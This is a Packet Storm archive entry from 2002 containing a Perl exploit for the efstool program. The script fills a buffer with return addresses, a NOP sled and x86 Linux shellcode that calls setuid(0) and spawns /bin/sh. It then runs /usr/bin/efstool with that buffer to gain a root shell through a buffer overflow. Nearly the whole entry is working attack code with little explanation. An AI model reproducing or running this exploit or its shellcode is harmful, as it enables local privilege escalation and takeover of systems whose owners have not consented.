efstool.pl

2002-09-11T00:00:00
ID PACKETSTORM:29616
Type packetstorm
Reporter user_15335@erato.uk.clara.net
Modified 2002-09-11T00:00:00

Description

                                        
                                            ` #!/usr/bin/perl  
# Another efstool exploit   
  
$shell =   
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89".  
"\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89".  
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";  
  
  
$ret =0xbfffe590;  
$buf = 3000;  
$egg = 2000;  
$nop = "\x90";  
$offset = 0;  
  
if (@ARGV == 1) { $offset = $ARGV[0]; }  
  
$addr = pack('l', ($ret + $offset));  
for ($i = 0; $i < $buf; $i += 4) {  
$buffer .= $addr;  
}  
  
for ($i = 0; $i < ($egg - length($shell) - 100); $i++) {  
$buffer .= $nop;   
}   
  
$buffer .= $shell;   
exec("/usr/bin/efstool $buffer");  
`